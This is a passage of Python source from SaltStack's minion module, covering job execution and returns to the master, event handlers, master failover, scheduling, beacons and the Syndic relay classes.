used as a threading target, start the actual minion side execution. ''' fn_ = os.path.join(minion_instance.proc_dir, data['jid']) if opts['multiprocessing'] and not salt.utils.platform.is_windows(): # Shutdown the multiprocessing before daemonizing salt.log.setup.shutdown_multiprocessing_logging() salt.utils.process.daemonize_if(opts) # Reconfigure multiprocessing logging after daemonizing salt.log.setup.setup_multiprocessing_logging() salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid'])) sdata = {'pid': os.getpid()} sdata.update(data) log.info('Starting a new job with PID %s', sdata['pid']) with salt.utils.files.fopen(fn_, 'w+b') as fp_: fp_.write(minion_instance.serial.dumps(sdata)) multifunc_ordered = opts.get('multifunc_ordered', False) num_funcs = len(data['fun']) if multifunc_ordered: ret = { 'return': [None] * num_funcs, 'retcode': [None] * num_funcs, 'success': [False] * num_funcs } else: ret = { 'return': {}, 'retcode': {}, 'success': {} } for ind in range(0, num_funcs): if not multifunc_ordered: ret['success'][data['fun'][ind]] = False try: minion_blackout_violation = False if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False): whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', []) # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist: minion_blackout_violation = True elif minion_instance.opts['grains'].get('minion_blackout', False): whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', []) if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist: minion_blackout_violation = True if minion_blackout_violation: raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' ' 'to False in pillar or grains to resume operations. Only ' 'saltutil.refresh_pillar allowed in blackout mode.') func = minion_instance.functions[data['fun'][ind]] args, kwargs = load_args_and_kwargs( func, data['arg'][ind], data) minion_instance.functions.pack['__context__']['retcode'] = 0 key = ind if multifunc_ordered else data['fun'][ind] ret['return'][key] = func(*args, **kwargs) retcode = minion_instance.functions.pack['__context__'].get( 'retcode', 0 ) if retcode == 0: # No nonzero retcode in __context__ dunder. Check if return # is a dictionary with a "result" or "success" key. try: func_result = all(ret['return'][key].get(x, True) for x in ('result', 'success')) except Exception: # return data is not a dict func_result = True if not func_result: retcode = 1 ret['retcode'][key] = retcode ret['success'][key] = retcode == 0 except Exception as exc: trb = traceback.format_exc() log.warning('The minion function caused an exception: %s', exc) if multifunc_ordered: ret['return'][ind] = trb else: ret['return'][data['fun'][ind]] = trb ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'metadata' in data: ret['metadata'] = data['metadata'] if minion_instance.connected: minion_instance._return_pub( ret, timeout=minion_instance._return_retry_timer() ) if data['ret']: if 'ret_config' in data: ret['ret_config'] = data['ret_config'] if 'ret_kwargs' in data: ret['ret_kwargs'] = data['ret_kwargs'] for returner in set(data['ret'].split(',')): ret['id'] = opts['id'] try: minion_instance.returners['{0}.returner'.format( returner )](ret) except Exception as exc: log.error( 'The return failed for job %s: %s', data['jid'], exc ) def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True): ''' Return the data from the executed command to the master server ''' jid = ret.get('jid', ret.get('__jid__')) fun = ret.get('fun', ret.get('__fun__')) if self.opts['multiprocessing']: fn_ = os.path.join(self.proc_dir, jid) if os.path.isfile(fn_): try: os.remove(fn_) except (OSError, IOError): # The file is gone already pass log.info('Returning information for job: %s', jid) log.trace('Return data: %s', ret) if ret_cmd == '_syndic_return': load = {'cmd': ret_cmd, 'id': self.opts['uid'], 'jid': jid, 'fun': fun, 'arg': ret.get('arg'), 'tgt': ret.get('tgt'), 'tgt_type': ret.get('tgt_type'), 'load': ret.get('__load__')} if '__master_id__' in ret: load['master_id'] = ret['__master_id__'] load['return'] = {} for key, value in six.iteritems(ret): if key.startswith('__'): continue load['return'][key] = value else: load = {'cmd': ret_cmd, 'id': self.opts['id']} for key, value in six.iteritems(ret): load[key] = value if 'out' in ret: if isinstance(ret['out'], six.string_types): load['out'] = ret['out'] else: log.error( 'Invalid outputter %s. This is likely a bug.', ret['out'] ) else: try: oput = self.functions[fun].__outputter__ except (KeyError, AttributeError, TypeError): pass else: if isinstance(oput, six.string_types): load['out'] = oput if self.opts['cache_jobs']: # Local job cache has been enabled if ret['jid'] == 'req': ret['jid'] = salt.utils.jid.gen_jid(self.opts) salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret) if not self.opts['pub_ret']: return '' def timeout_handler(*_): log.warning( 'The minion failed to return the job information for job %s. ' 'This is often due to the master being shut down or ' 'overloaded. If the master is running, consider increasing ' 'the worker_threads value.', jid ) return True if sync: try: ret_val = self._send_req_sync(load, timeout=timeout) except SaltReqTimeoutError: timeout_handler() return '' else: with tornado.stack_context.ExceptionStackContext(timeout_handler): ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg log.trace('ret_val = %s', ret_val) # pylint: disable=no-member return ret_val def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True): ''' Return the data from the executed command to the master server ''' if not isinstance(rets, list): rets = [rets] jids = {} for ret in rets: jid = ret.get('jid', ret.get('__jid__')) fun = ret.get('fun', ret.get('__fun__')) if self.opts['multiprocessing']: fn_ = os.path.join(self.proc_dir, jid) if os.path.isfile(fn_): try: os.remove(fn_) except (OSError, IOError): # The file is gone already pass log.info('Returning information for job: %s', jid) load = jids.setdefault(jid, {}) if ret_cmd == '_syndic_return': if not load: load.update({'id': self.opts['id'], 'jid': jid, 'fun': fun, 'arg': ret.get('arg'), 'tgt': ret.get('tgt'), 'tgt_type': ret.get('tgt_type'), 'load': ret.get('__load__'), 'return': {}}) if '__master_id__' in ret: load['master_id'] = ret['__master_id__'] for key, value in six.iteritems(ret): if key.startswith('__'): continue load['return'][key] = value else: load.update({'id': self.opts['id']}) for key, value in six.iteritems(ret): load[key] = value if 'out' in ret: if isinstance(ret['out'], six.string_types): load['out'] = ret['out'] else: log.error( 'Invalid outputter %s. This is likely a bug.', ret['out'] ) else: try: oput = self.functions[fun].__outputter__ except (KeyError, AttributeError, TypeError): pass else: if isinstance(oput, six.string_types): load['out'] = oput if self.opts['cache_jobs']: # Local job cache has been enabled salt.utils.minion.cache_jobs(self.opts, load['jid'], ret) load = {'cmd': ret_cmd, 'load': list(six.itervalues(jids))} def timeout_handler(*_): log.warning( 'The minion failed to return the job information for job %s. ' 'This is often due to the master being shut down or ' 'overloaded. If the master is running, consider increasing ' 'the worker_threads value.', jid ) return True if sync: try: ret_val = self._send_req_sync(load, timeout=timeout) except SaltReqTimeoutError: timeout_handler() return '' else: with tornado.stack_context.ExceptionStackContext(timeout_handler): ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg log.trace('ret_val = %s', ret_val) # pylint: disable=no-member return ret_val def _state_run(self): ''' Execute a state run based on information set in the minion config file ''' if self.opts['startup_states']: if self.opts.get('master_type', 'str') == 'disable' and \ self.opts.get('file_client', 'remote') == 'remote': log.warning( 'Cannot run startup_states when \'master_type\' is set ' 'to \'disable\' and \'file_client\' is set to ' '\'remote\'. Skipping.' ) else: data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')} if self.opts['startup_states'] == 'sls': data['fun'] = 'state.sls' data['arg'] = [self.opts['sls_list']] elif self.opts['startup_states'] == 'top': data['fun'] = 'state.top' data['arg'] = [self.opts['top_file']] else: data['fun'] = 'state.highstate' data['arg'] = [] self._handle_decoded_payload(data) def _refresh_grains_watcher(self, refresh_interval_in_minutes): ''' Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion :param refresh_interval_in_minutes: :return: None ''' if '__update_grains' not in self.opts.get('schedule', {}): if 'schedule' not in self.opts: self.opts['schedule'] = {} self.opts['schedule'].update({ '__update_grains': { 'function': 'event.fire', 'args': [{}, 'grains_refresh'], 'minutes': refresh_interval_in_minutes } }) def _fire_master_minion_start(self): # Send an event to the master that the minion is live if self.opts['enable_legacy_startup_events']: # Old style event. Defaults to False in Sodium release. self._fire_master( 'Minion {0} started at {1}'.format( self.opts['id'], time.asctime() ), 'minion_start' ) # send name spaced event self._fire_master( 'Minion {0} started at {1}'.format( self.opts['id'], time.asctime() ), tagify([self.opts['id'], 'start'], 'minion'), ) def module_refresh(self, force_refresh=False, notify=False): ''' Refresh the functions and returners. ''' log.debug('Refreshing modules. Notify=%s', notify) self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify) self.schedule.functions = self.functions self.schedule.returners = self.returners def beacons_refresh(self): ''' Refresh the functions and returners. ''' log.debug('Refreshing beacons.') self.beacons = salt.beacons.Beacon(self.opts, self.functions) def matchers_refresh(self): ''' Refresh the matchers ''' log.debug('Refreshing matchers.') self.matchers = salt.loader.matchers(self.opts) # TODO: only allow one future in flight at a time? @tornado.gen.coroutine def pillar_refresh(self, force_refresh=False, notify=False): ''' Refresh the pillar ''' if self.connected: log.debug('Refreshing pillar. Notify: %s', notify) async_pillar = salt.pillar.get_async_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['saltenv'], pillarenv=self.opts.get('pillarenv'), ) try: self.opts['pillar'] = yield async_pillar.compile_pillar() if notify: evt = salt.utils.event.get_event('minion', opts=self.opts, listen=False) evt.fire_event({'complete': True}, tag=salt.defaults.events.MINION_PILLAR_COMPLETE) except SaltClientError: # Do not exit if a pillar refresh fails. log.error('Pillar data could not be refreshed. ' 'One or more masters may be down!') finally: async_pillar.destroy() self.module_refresh(force_refresh, notify) def manage_schedule(self, tag, data): ''' Refresh the functions and returners. ''' func = data.get('func', None) name = data.get('name', None) schedule = data.get('schedule', None) where = data.get('where', None) persist = data.get('persist', None) funcs = {'delete': ('delete_job', (name, persist)), 'add': ('add_job', (schedule, persist)), 'modify': ('modify_job', (name, schedule, persist)), 'enable': ('enable_schedule', ()), 'disable': ('disable_schedule', ()), 'enable_job': ('enable_job', (name, persist)), 'disable_job': ('disable_job', (name, persist)), 'postpone_job': ('postpone_job', (name, data)), 'skip_job': ('skip_job', (name, data)), 'reload': ('reload', (schedule)), 'list': ('list', (where)), 'save_schedule': ('save_schedule', ()), 'get_next_fire_time': ('get_next_fire_time', (name))} # Call the appropriate schedule function try: alias, params = funcs.get(func) getattr(self.schedule, alias)(*params) except TypeError: log.error('Function "%s" is unavailable in salt.utils.scheduler', func) def manage_beacons(self, tag, data): ''' Manage Beacons ''' func = data.get('func', None) name = data.get('name', None) beacon_data = data.get('beacon_data', None) include_pillar = data.get('include_pillar', None) include_opts = data.get('include_opts', None) funcs = {'add': ('add_beacon', (name, beacon_data)), 'modify': ('modify_beacon', (name, beacon_data)), 'delete': ('delete_beacon', (name,)), 'enable': ('enable_beacons', ()), 'disable': ('disable_beacons', ()), 'enable_beacon': ('enable_beacon', (name,)), 'disable_beacon': ('disable_beacon', (name,)), 'list': ('list_beacons', (include_opts, include_pillar)), 'list_available': ('list_available_beacons', ()), 'validate_beacon': ('validate_beacon', (name, beacon_data)), 'reset': ('reset', ())} # Call the appropriate beacon function try: alias, params = funcs.get(func) getattr(self.beacons, alias)(*params) except AttributeError: log.error('Function "%s" is unavailable in salt.beacons', func) except TypeError as exc: log.info( 'Failed to handle %s with data(%s). Error: %s', tag, data, exc, exc_info_on_loglevel=logging.DEBUG ) def environ_setenv(self, tag, data): ''' Set the salt-minion main process environment according to the data contained in the minion event data ''' environ = data.get('environ', None) if environ is None: return False false_unsets = data.get('false_unsets', False) clear_all = data.get('clear_all', False) import salt.modules.environ as mod_environ return mod_environ.setenv(environ, false_unsets, clear_all) def _pre_tune(self): ''' Set the minion running flag and issue the appropriate warnings if the minion cannot be started or is already running ''' if self._running is None: self._running = True elif self._running is False: log.error( 'This %s was scheduled to stop. Not running %s.tune_in()', self.__class__.__name__, self.__class__.__name__ ) return elif self._running is True: log.error( 'This %s is already running. Not running %s.tune_in()', self.__class__.__name__, self.__class__.__name__ ) return try: log.info( '%s is starting as user \'%s\'', self.__class__.__name__, salt.utils.user.get_user() ) except Exception as err: # Only windows is allowed to fail here. See #3189. Log as debug in # that case. Else, error. log.log( salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR, 'Failed to get the user who is starting %s', self.__class__.__name__, exc_info=err ) def _mine_send(self, tag, data): ''' Send mine data to the master ''' channel = salt.transport.client.ReqChannel.factory(self.opts) data['tok'] = self.tok try: ret = channel.send(data) return ret except SaltReqTimeoutError: log.warning('Unable to send mine data to master.') return None finally: channel.close() def _handle_tag_module_refresh(self, tag, data): ''' Handle a module_refresh event ''' self.module_refresh( force_refresh=data.get('force_refresh', False), notify=data.get('notify', False) ) @tornado.gen.coroutine def _handle_tag_pillar_refresh(self, tag, data): ''' Handle a pillar_refresh event ''' yield self.pillar_refresh( force_refresh=data.get('force_refresh', False), notify=data.get('notify', False) ) def _handle_tag_beacons_refresh(self, tag, data): ''' Handle a beacon_refresh event ''' self.beacons_refresh() def _handle_tag_matchers_refresh(self, tag, data): ''' Handle a matchers_refresh event ''' self.matchers_refresh() def _handle_tag_manage_schedule(self, tag, data): ''' Handle a manage_schedule event ''' self.manage_schedule(tag, data) def _handle_tag_manage_beacons(self, tag, data): ''' Handle a manage_beacons event ''' self.manage_beacons(tag, data) def _handle_tag_grains_refresh(self, tag, data): ''' Handle a grains_refresh event ''' if (data.get('force_refresh', False) or self.grains_cache != self.opts['grains']): self.pillar_refresh(force_refresh=True) self.grains_cache = self.opts['grains'] def _handle_tag_environ_setenv(self, tag, data): ''' Handle a environ_setenv event ''' self.environ_setenv(tag, data) def _handle_tag_minion_mine(self, tag, data): ''' Handle a _minion_mine event ''' self._mine_send(tag, data) def _handle_tag_fire_master(self, tag, data): ''' Handle a fire_master event ''' if self.connected: log.debug('Forwarding master event tag=%s', data['tag']) self._fire_master(data['data'], data['tag'], data['events'], data['pretag']) def _handle_tag_master_disconnected_failback(self, tag, data): ''' Handle a master_disconnected_failback event ''' # if the master disconnect event is for a different master, raise an exception if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']: # not mine master, ignore return if tag.startswith(master_event(type='failback')): # if the master failback event is not for the top master, raise an exception if data['master'] != self.opts['master_list'][0]: raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format( data['master'], self.opts['master'])) # if the master failback event is for the current master, raise an exception elif data['master'] == self.opts['master'][0]: raise SaltException('Already connected to \'{0}\''.format(data['master'])) if self.connected: # we are not connected anymore self.connected = False log.info('Connection to master %s lost', self.opts['master']) # we can't use the config default here because the default '0' value is overloaded # to mean 'if 0 disable the job', but when salt detects a timeout it also sets up # these jobs master_alive_interval = self.opts['master_alive_interval'] or 60 if self.opts['master_type'] != 'failover': # modify the scheduled job to fire on reconnect if self.opts['transport'] != 'tcp': schedule = { 'function': 'status.master', 'seconds': master_alive_interval, 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master'], 'connected': False} } self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']), schedule=schedule) else: # delete the scheduled job to don't interfere with the failover process if self.opts['transport'] != 'tcp': self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True) log.info('Trying to tune in to next master from master-list') if hasattr(self, 'pub_channel'): self.pub_channel.on_recv(None) if hasattr(self.pub_channel, 'auth'): self.pub_channel.auth.invalidate() if hasattr(self.pub_channel, 'close'): self.pub_channel.close() del self.pub_channel # if eval_master finds a new master for us, self.connected # will be True again on successful master authentication try: master, self.pub_channel = yield self.eval_master( opts=self.opts, failed=True, failback=tag.startswith(master_event(type='failback'))) except SaltClientError: pass if self.connected: self.opts['master'] = master # re-init the subsystems to work with the new master log.info( 'Re-initialising subsystems for new master %s', self.opts['master'] ) # put the current schedule into the new loaders self.opts['schedule'] = self.schedule.option('schedule') self.functions, self.returners, self.function_errors, self.executors = self._load_modules() # make the schedule to use the new 'functions' loader self.schedule.functions = self.functions self.pub_channel.on_recv(self._handle_payload) self._fire_master_minion_start() log.info('Minion is ready to receive requests!') # update scheduled job to run with the new master addr if self.opts['transport'] != 'tcp': schedule = { 'function': 'status.master', 'seconds': master_alive_interval, 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master'], 'connected': True} } self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']), schedule=schedule) if self.opts['master_failback'] and 'master_list' in self.opts: if self.opts['master'] != self.opts['master_list'][0]: schedule = { 'function': 'status.ping_master', 'seconds': self.opts['master_failback_interval'], 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master_list'][0]} } self.schedule.modify_job(name=master_event(type='failback'), schedule=schedule) else: self.schedule.delete_job(name=master_event(type='failback'), persist=True) else: self.restart = True self.io_loop.stop() def _handle_tag_master_connected(self, tag, data): ''' Handle a master_connected event ''' # handle this event only once. otherwise it will pollute the log # also if master type is failover all the reconnection work is done # by `disconnected` event handler and this event must never happen, # anyway check it to be sure if not self.connected and self.opts['master_type'] != 'failover': log.info('Connection to master %s re-established', self.opts['master']) self.connected = True # modify the __master_alive job to only fire, # if the connection is lost again if self.opts['transport'] != 'tcp': if self.opts['master_alive_interval'] > 0: schedule = { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master'], 'connected': True} } self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']), schedule=schedule) else: self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True) def _handle_tag_schedule_return(self, tag, data): ''' Handle a _schedule_return event ''' # reporting current connection with master if data['schedule'].startswith(master_event(type='alive', master='')): if data['return']: log.debug( 'Connected to master %s', data['schedule'].split(master_event(type='alive', master=''))[1] ) self._return_pub(data, ret_cmd='_return', sync=False) def _handle_tag_salt_error(self, tag, data): ''' Handle a _salt_error event ''' if self.connected: log.debug('Forwarding salt error event tag=%s', tag) self._fire_master(data, tag) def _handle_tag_salt_auth_creds(self, tag, data): ''' Handle a salt_auth_creds event ''' key = tuple(data['key']) log.debug( 'Updating auth data for %s: %s -> %s', key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds'] ) salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds'] @tornado.gen.coroutine def handle_event(self, package): ''' Handle an event from the epull_sock (all local minion events) ''' if not self.ready: raise tornado.gen.Return() tag, data = salt.utils.event.SaltEvent.unpack(package) log.debug( 'Minion of \'%s\' is handling event tag \'%s\'', self.opts['master'], tag ) tag_functions = { 'beacons_refresh': self._handle_tag_beacons_refresh, 'environ_setenv': self._handle_tag_environ_setenv, 'fire_master': self._handle_tag_fire_master, 'grains_refresh': self._handle_tag_grains_refresh, 'matchers_refresh': self._handle_tag_matchers_refresh, 'manage_schedule': self._handle_tag_manage_schedule, 'manage_beacons': self._handle_tag_manage_beacons, '_minion_mine': self._handle_tag_minion_mine, 'module_refresh': self._handle_tag_module_refresh, 'pillar_refresh': self._handle_tag_pillar_refresh, 'salt/auth/creds': self._handle_tag_salt_auth_creds, '_salt_error': self._handle_tag_salt_error, '__schedule_return': self._handle_tag_schedule_return, master_event(type='disconnected'): self._handle_tag_master_disconnected_failback, master_event(type='failback'): self._handle_tag_master_disconnected_failback, master_event(type='connected'): self._handle_tag_master_connected, } # Run the appropriate function for tag_function in tag_functions: if tag.startswith(tag_function): tag_functions[tag_function](tag, data) def _fallback_cleanups(self): ''' Fallback cleanup routines, attempting to fix leaked processes, threads, etc. ''' # Add an extra fallback in case a forked process leaks through multiprocessing.active_children() # Cleanup Windows threads if not salt.utils.platform.is_windows(): return for thread in self.win_proc: if not thread.is_alive(): thread.join() try: self.win_proc.remove(thread) del thread except (ValueError, NameError): pass def _setup_core(self): ''' Set up the core minion attributes. This is safe to call multiple times. ''' if not self.ready: # First call. Initialize. self.functions, self.returners, self.function_errors, self.executors = self._load_modules() self.serial = salt.payload.Serial(self.opts) self.mod_opts = self._prep_mod_opts() # self.matcher = Matcher(self.opts, self.functions) self.matchers = salt.loader.matchers(self.opts) self.beacons = salt.beacons.Beacon(self.opts, self.functions) uid = salt.utils.user.get_uid(user=self.opts.get('user', None)) self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid) self.grains_cache = self.opts['grains'] self.ready = True def setup_beacons(self, before_connect=False): ''' Set up the beacons. This is safe to call multiple times. ''' self._setup_core() loop_interval = self.opts['loop_interval'] new_periodic_callbacks = {} if 'beacons' not in self.periodic_callbacks: self.beacons = salt.beacons.Beacon(self.opts, self.functions) def handle_beacons(): # Process Beacons beacons = None try: beacons = self.process_beacons(self.functions) except Exception: log.critical('The beacon errored: ', exc_info=True) if beacons and self.connected: self._fire_master(events=beacons) new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback( handle_beacons, loop_interval * 1000) if before_connect: # Make sure there is a chance for one iteration to occur before connect handle_beacons() if 'cleanup' not in self.periodic_callbacks: new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback( self._fallback_cleanups, loop_interval * 1000) # start all the other callbacks for periodic_cb in six.itervalues(new_periodic_callbacks): periodic_cb.start() self.periodic_callbacks.update(new_periodic_callbacks) def setup_scheduler(self, before_connect=False): ''' Set up the scheduler. This is safe to call multiple times. ''' self._setup_core() loop_interval = self.opts['loop_interval'] new_periodic_callbacks = {} if 'schedule' not in self.periodic_callbacks: if 'schedule' not in self.opts: self.opts['schedule'] = {} if not hasattr(self, 'schedule'): self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners, utils=self.utils, cleanup=[master_event(type='alive')]) try: if self.opts['grains_refresh_every']: # In minutes, not seconds! log.debug( 'Enabling the grains refresher. Will run every %d minute(s).', self.opts['grains_refresh_every'] ) self._refresh_grains_watcher(abs(self.opts['grains_refresh_every'])) except Exception as exc: log.error( 'Exception occurred in attempt to initialize grain refresh ' 'routine during minion tune-in: %s', exc ) # TODO: actually listen to the return and change period def handle_schedule(): self.process_schedule(self, loop_interval) new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000) if before_connect: # Make sure there is a chance for one iteration to occur before connect handle_schedule() if 'cleanup' not in self.periodic_callbacks: new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback( self._fallback_cleanups, loop_interval * 1000) # start all the other callbacks for periodic_cb in six.itervalues(new_periodic_callbacks): periodic_cb.start() self.periodic_callbacks.update(new_periodic_callbacks) # Main Minion Tune In def tune_in(self, start=True): ''' Lock onto the publisher. This is the main event loop for the minion :rtype : None ''' self._pre_tune() log.debug('Minion \'%s\' trying to tune in', self.opts['id']) if start: if self.opts.get('beacons_before_connect', False): self.setup_beacons(before_connect=True) if self.opts.get('scheduler_before_connect', False): self.setup_scheduler(before_connect=True) self.sync_connect_master() if self.connected: self._fire_master_minion_start() log.info('Minion is ready to receive requests!') # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() # Make sure to gracefully handle CTRL_LOGOFF_EVENT if HAS_WIN_FUNCTIONS: salt.utils.win_functions.enable_ctrl_logoff_handler() # On first startup execute a state run if configured to do so self._state_run() self.setup_beacons() self.setup_scheduler() # schedule the stuff that runs every interval ping_interval = self.opts.get('ping_interval', 0) * 60 if ping_interval > 0 and self.connected: def ping_master(): try: def ping_timeout_handler(*_): if self.opts.get('auth_safemode', False): log.error('** Master Ping failed. Attempting to restart minion**') delay = self.opts.get('random_reauth_delay', 5) log.info('delaying random_reauth_delay %ss', delay) try: self.functions['service.restart'](service_name()) except KeyError: # Probably no init system (running in docker?) log.warning( 'ping_interval reached without response ' 'from the master, but service.restart ' 'could not be run to restart the minion ' 'daemon. ping_interval requires that the ' 'minion is running under an init system.' ) self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler) except Exception: log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG) self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000) self.periodic_callbacks['ping'].start() # add handler to subscriber if hasattr(self, 'pub_channel') and self.pub_channel is not None: self.pub_channel.on_recv(self._handle_payload) elif self.opts.get('master_type') != 'disable': log.error('No connection to master found. Scheduled jobs will not run.') if start: try: self.io_loop.start() if self.restart: self.destroy() except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown self.destroy() def _handle_payload(self, payload): if payload is not None and payload['enc'] == 'aes': if self._target_load(payload['load']): self._handle_decoded_payload(payload['load']) elif self.opts['zmq_filtering']: # In the filtering enabled case, we'd like to know when minion sees something it shouldnt log.trace( 'Broadcast message received not for this minion, Load: %s', payload['load'] ) # If it's not AES, and thus has not been verified, we do nothing. # In the future, we could add support for some clearfuncs, but # the minion currently has no need. def _target_load(self, load): # Verify that the publication is valid if 'tgt' not in load or 'jid' not in load or 'fun' not in load \ or 'arg' not in load: return False # Verify that the publication applies to this minion # It's important to note that the master does some pre-processing # to determine which minions to send a request to. So for example, # a "salt -G 'grain_key:grain_val' test.ping" will invoke some # pre-processing on the master and this minion should not see the # publication if the master does not determine that it should. if 'tgt_type' in load: match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None) if match_func is None: return False if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'): delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM) if not match_func(load['tgt'], delimiter=delimiter): return False elif not match_func(load['tgt']): return False else: if not self.matchers['glob_match.match'](load['tgt']): return False return True def destroy(self): ''' Tear down the minion ''' if self._running is False: return self._running = False if hasattr(self, 'schedule'): del self.schedule if hasattr(self, 'pub_channel') and self.pub_channel is not None: self.pub_channel.on_recv(None) if hasattr(self.pub_channel, 'close'): self.pub_channel.close() del self.pub_channel if hasattr(self, 'periodic_callbacks'): for cb in six.itervalues(self.periodic_callbacks): cb.stop() def __del__(self): self.destroy() class Syndic(Minion): ''' Make a Syndic minion, this minion will use the minion keys on the master to authenticate with a higher level master. ''' def __init__(self, opts, **kwargs): self._syndic_interface = opts.get('interface') self._syndic = True # force auth_safemode True because Syndic don't support autorestart opts['auth_safemode'] = True opts['loop_interval'] = 1 super(Syndic, self).__init__(opts, **kwargs) self.mminion = salt.minion.MasterMinion(opts) self.jid_forward_cache = set() self.jids = {} self.raw_events = [] self.pub_future = None def _handle_decoded_payload(self, data): ''' Override this method if you wish to handle the decoded data differently. ''' # TODO: even do this?? data['to'] = int(data.get('to', self.opts['timeout'])) - 1 # Only forward the command if it didn't originate from ourselves if data.get('master_id', 0) != self.opts.get('master_id', 1): self.syndic_cmd(data) def syndic_cmd(self, data): ''' Take the now clear load and forward it on to the client cmd ''' # Set up default tgt_type if 'tgt_type' not in data: data['tgt_type'] = 'glob' kwargs = {} # optionally add a few fields to the publish data for field in ('master_id', # which master the job came from 'user', # which user ran the job ): if field in data: kwargs[field] = data[field] def timeout_handler(*args): log.warning('Unable to forward pub data: %s', args[1]) return True with tornado.stack_context.ExceptionStackContext(timeout_handler): self.local.pub_async(data['tgt'], data['fun'], data['arg'], data['tgt_type'], data['ret'], data['jid'], data['to'], io_loop=self.io_loop, callback=lambda _: None, **kwargs) def fire_master_syndic_start(self): # Send an event to the master that the minion is live if self.opts['enable_legacy_startup_events']: # Old style event. Defaults to false in Sodium release. self._fire_master( 'Syndic {0} started at {1}'.format( self.opts['id'], time.asctime() ), 'syndic_start', sync=False, ) self._fire_master( 'Syndic {0} started at {1}'.format( self.opts['id'], time.asctime() ), tagify([self.opts['id'], 'start'], 'syndic'), sync=False, ) # TODO: clean up docs def tune_in_no_block(self): ''' Executes the tune_in sequence but omits extra logging and the management of the event bus assuming that these are handled outside the tune_in sequence ''' # Instantiate the local client self.local = salt.client.get_local_client( self.opts['_minion_conf_file'], io_loop=self.io_loop) # add handler to subscriber self.pub_channel.on_recv(self._process_cmd_socket) def _process_cmd_socket(self, payload): if payload is not None and payload['enc'] == 'aes': log.trace('Handling payload') self._handle_decoded_payload(payload['load']) # If it's not AES, and thus has not been verified, we do nothing. # In the future, we could add support for some clearfuncs, but # the syndic currently has no need. @tornado.gen.coroutine def reconnect(self): if hasattr(self, 'pub_channel'): self.pub_channel.on_recv(None) if hasattr(self.pub_channel, 'close'): self.pub_channel.close() del self.pub_channel # if eval_master finds a new master for us, self.connected # will be True again on successful master authentication master, self.pub_channel = yield self.eval_master(opts=self.opts) if self.connected: self.opts['master'] = master self.pub_channel.on_recv(self._process_cmd_socket) log.info('Minion is ready to receive requests!') raise tornado.gen.Return(self) def destroy(self): ''' Tear down the syndic minion ''' # We borrowed the local clients poller so give it back before # it's destroyed. Reset the local poller reference. super(Syndic, self).destroy() if hasattr(self, 'local'): del self.local if hasattr(self, 'forward_events'): self.forward_events.stop() # TODO: need a way of knowing if the syndic connection is busted class SyndicManager(MinionBase): ''' Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from all minions connected to it to the list of masters it is connected to. Modes (controlled by `syndic_mode`: sync: This mode will synchronize all events and publishes from higher level masters cluster: This mode will only sync job publishes and returns Note: jobs will be returned best-effort to the requesting master. This also means (since we are using zmq) that if a job was fired and the master disconnects between the publish and return, that the return will end up in a zmq buffer in this Syndic headed to that original master. In addition, since these classes all seem to use a mix of blocking and non-blocking calls (with varying timeouts along the way) this daemon does not handle failure well, it will (under most circumstances) stall the daemon for ~15s trying to forward events to the down master ''' # time to connect to upstream master SYNDIC_CONNECT_TIMEOUT = 5 SYNDIC_EVENT_TIMEOUT = 5 def __init__(self, opts, io_loop=None): opts['loop_interval'] = 1 super(SyndicManager, self).__init__(opts) self.mminion = salt.minion.MasterMinion(opts) # sync (old behavior), cluster (only returns and publishes) self.syndic_mode = self.opts.get('syndic_mode', 'sync') self.syndic_failover = self.opts.get('syndic_failover', 'random') self.auth_wait = self.opts['acceptance_wait_time'] self.max_auth_wait = 